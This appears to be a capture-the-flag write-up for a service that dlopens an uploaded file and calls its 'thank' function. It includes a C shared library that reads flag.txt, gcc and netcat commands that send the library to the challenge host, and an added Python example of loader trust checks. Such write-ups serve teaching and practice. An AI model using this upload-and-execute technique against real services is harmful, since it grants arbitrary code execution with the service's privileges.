Description: I am so grateful for your precious files!

nc challs.pwnoh.io 13373

First look

Connecting with netcat we get:

What is the size of your file (in bytes)?
1234
Send your file!
azerty
Thanks for your file!

Ok so we have to send a file.

Decompiling

Let's open Binary Ninja and take a look.

  • We find the function asking for the file size (screenshot: file size function)
  • Space for the file is malloc'ed
  • The file is then asked for and read

(screenshot: ask for file)

  • After some checks, and what I believe is a write to disk, we get to the interesting part

Exec function

We find an interesting function. After a bit of reading the manual we understand that dlopen opens a shared library object, dlsym looks up a symbol in it and returns its address, and that address is then called through a register (the decompiler shows the indirect call as rax3()). So we need to send a shared library object that contains a symbol named thank (a function, for example), and that function will get executed. Let's do it!

(screenshot: exec function)
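The loader pattern the challenge exposes (dlopen an uploaded file, dlsym a fixed name, call it), written the way a service would have to gate it before the dlopen ever happens. This is an added example, not the challenge's own code: ctypes.CDLL stands in for dlopen and attribute lookup for dlsym, and the plugin directory, the entry symbol name and the constructed sample file are assumptions.

```python
import ctypes
import os
import stat
import tempfile

ENTRY_SYMBOL = "thank"  # the symbol the challenge binary resolves with dlsym

def plugin_file_is_trusted(path, expect_uid):
    """Regular file owned by expect_uid, not group/other writable. Returns (ok, reason)."""
    try:
        st = os.lstat(path)  # lstat: do not follow a planted symlink
    except OSError as exc:
        return False, "stat failed: %s" % exc
    if not stat.S_ISREG(st.st_mode):
        return False, "not a regular file"
    if st.st_uid != expect_uid:
        return False, "owner uid %d, expected %d" % (st.st_uid, expect_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False, "writable by group or others"
    return True, "ok"

def load_plugin(name, plugin_dir, expect_uid):
    """Bare name only, trust check, then dlopen/dlsym via ctypes. Returns (fn or None, reason)."""
    if not name or "/" in name or name.startswith("."):
        return None, "rejected plugin name"
    path = os.path.join(plugin_dir, name)
    ok, why = plugin_file_is_trusted(path, expect_uid)
    if not ok:
        return None, why
    try:
        lib = ctypes.CDLL(path)             # dlopen(3)
        entry = getattr(lib, ENTRY_SYMBOL)  # dlsym(3)
    except (OSError, AttributeError) as exc:
        return None, "load failed: %s" % exc
    return entry, "ok"

def demo():
    """Constructed sample: a world-writable non-ELF file standing in for an upload."""
    d, uid = tempfile.mkdtemp(), os.getuid()
    path = os.path.join(d, "upload.so")
    with open(path, "wb") as f:
        f.write(b"not a shared object")
    os.chmod(path, 0o666)
    writable = plugin_file_is_trusted(path, uid)[0]
    os.chmod(path, 0o644)
    loaded = load_plugin("upload.so", d, uid)
    return {"writable": writable, "fixed": plugin_file_is_trusted(path, uid)[0],
            "loaded": loaded[0] is None and loaded[1].startswith("load failed"),
            "traversal": load_plugin("../upload.so", d, uid)[1]}
```

The challenge skips every one of these gates: it writes attacker bytes to disk and dlopens them directly, so any exported thank symbol runs with the service's privileges.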

Getting the flag

We write a small C program with a thank function.

#include <stdio.h>

/* Exported symbol: the server resolves it with dlsym("thank") and calls it. */
void thank(void){
    FILE* file = fopen("flag.txt", "r");
    char buff[101];
    if (file == NULL) {
        perror("fopen");
        return;
    }
    if (fgets(buff, sizeof buff, file) != NULL)
        printf("%s", buff);
    fflush(stdout);   /* make sure the line is sent before the server exits */
    fclose(file);
}

We then compile it and send it to the server.

gcc -shared -fPIC -o exploit.so exploit.c
(echo `du -b exploit.so`; cat exploit.so) | nc challs.pwnoh.io 13373

And boom, we get the flag (I didn't save it, so I can't put it here).